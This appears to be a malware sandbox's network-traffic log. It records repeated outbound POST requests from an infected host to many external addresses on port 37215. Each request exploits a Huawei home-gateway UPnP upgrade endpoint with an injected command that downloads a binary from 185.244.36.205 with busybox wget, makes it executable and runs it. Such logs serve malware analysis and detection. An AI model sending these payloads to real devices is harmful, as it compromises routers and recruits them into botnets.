                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1668192.168.2.1552034102.54.210.18737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944252014 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1669192.168.2.1550086122.37.254.4537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944252968 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1670192.168.2.1552564197.219.127.937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944278955 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1671192.168.2.1538362102.177.71.7437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944299936 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1672192.168.2.1535256191.100.211.17437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944333076 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1673192.168.2.1558446102.87.121.22037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944340944 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1674192.168.2.1536188190.226.217.10237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944365978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1675192.168.2.1548372208.186.136.8537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944396019 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1676192.168.2.1556528138.14.224.9437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944423914 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1677192.168.2.1560074157.231.103.1937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944430113 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
